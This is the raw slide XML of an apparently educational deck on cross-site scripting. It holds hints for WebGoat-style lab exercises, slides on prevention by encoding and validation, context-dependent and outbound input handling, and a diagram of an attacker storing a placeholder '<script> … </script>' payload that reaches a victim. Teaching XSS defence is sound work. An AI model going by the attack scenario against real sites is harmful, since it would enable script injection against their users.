        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="400291624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57200" y="509845"/>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Part 10</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="1611500"/>
            <a:ext cx="8378371" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Hint: Open the Firefox Debugger and look for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>GoatRouter.js</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2999045"/>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Part 11-13</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609599" y="3948300"/>
            <a:ext cx="8378371" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Hint: Use the Firefox console to visualize if a command is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" smtClean="0"/>
              <a:t>executed correctly</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="391000058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x-none" b="1" dirty="0" smtClean="0"/>
              <a:t>How to Prevent XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="418260253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a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" b="1" dirty="0" smtClean="0"/>
              <a:t>reventing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" b="1" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="1391357"/>
            <a:ext cx="8378371" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>XSS is a code injection where user input is mistakenly interpreted as malicious program code.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2746024"/>
            <a:ext cx="8378371" cy="3108544"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Secure input handling is needed:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>: escapes the user input so that the browser interprets it only as data and not as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>code.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Validation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>filters </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>user input so that the browser interprets it as code without malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>commands.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="420158533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86506"/>
            <a:ext cx="91440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Factors affecting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" b="1" dirty="0" smtClean="0"/>
              <a:t> Encoding/Validation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="1391357"/>
            <a:ext cx="8378371" cy="4770537"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Context: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>secure input handling needs to be performed differently depending on where in a page the user input is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>inserted.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Inbound/outbound: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Secure input handling can be performed either when your website receives the input (inbound) or right before your website inserts the input into a page (outbound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Client/server: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>secure input handling can be performed either on the client-side or on the server-side, both of which are needed u der </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>diffeerent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> circumstances</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="77618245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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" b="1" dirty="0" smtClean="0"/>
              <a:t>y Context Matters</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="1391357"/>
            <a:ext cx="8378371" cy="1384995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>There are different points </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>where the user input can be placed in a web page:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="Screenshot 2019-04-11 at 00.51.4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50042"/>
            <a:ext cx="8274050" cy="2990850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="264699649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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" b="1" dirty="0" smtClean="0"/>
              <a:t>y Context Matters</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Screenshot 2019-04-11 at 00.55.3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50" y="2743199"/>
            <a:ext cx="8261350" cy="1663700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308429" y="1718382"/>
            <a:ext cx="8378371" cy="1384995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Secure input handling will always have to be tailored to the context where the user input will be inserted.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="312935240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Inbound/Outbound Input Handling</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308429" y="1271488"/>
            <a:ext cx="8378371" cy="1384995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Instinctively, it might seem that XSS can be prevented by encoding or validating all user input as soon as your website receives it.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18270575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XSS Scenario</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="downloa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495" y="1501273"/>
            <a:ext cx="1391430" cy="1391430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1772495" y="2892703"/>
            <a:ext cx="1391430" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5757333" y="2523371"/>
            <a:ext cx="2150534" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web Application</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="downlo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2495" y="4040715"/>
            <a:ext cx="1293283" cy="1293283"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1772495" y="5333998"/>
            <a:ext cx="1391430" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Victim</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Arrow Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3163925" y="2336800"/>
            <a:ext cx="2593408" cy="92523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892801" y="3116038"/>
            <a:ext cx="660400" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DB</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5892801" y="3751299"/>
            <a:ext cx="1270000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3606799" y="1967468"/>
            <a:ext cx="2150534" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>POST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" smtClean="0"/>
              <a:t>… </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;/script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="524929" y="6306231"/>
            <a:ext cx="8805333" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.youtube.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>watch?v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=IuzU4y-UjLw&amp;feature=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>youtu.be</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5757333" y="2892703"/>
            <a:ext cx="2150534" cy="1933298"/>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50658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Inbound/Outbound Input Handling</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308429" y="1271488"/>
            <a:ext cx="8378371" cy="1384995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Instinctively, it might seem that XSS can be prevented by encoding or validating all user input as soon as your website receives it.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308429" y="2847624"/>
            <a:ext cx="8378371" cy="3877985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="mr-IN" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>…However the input can be inserted into several contexts in a page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="600" dirty="0" smtClean="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>There is no easy way of determining when user input arrives which context it will eventually be inserted into.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>he same user input needs to be inserted into different context.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Outbound </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>input handling can take into account the specific context that user input will be inserted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>into.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="46368537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Where to Perform Secure Input Handling</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308429" y="1718382"/>
            <a:ext cx="8378371" cy="2246769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Server-side code: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>	Persistent (or Storage) XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>					Reflective XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Client-side code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>:	DOM-Based XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="343186665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Encoding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
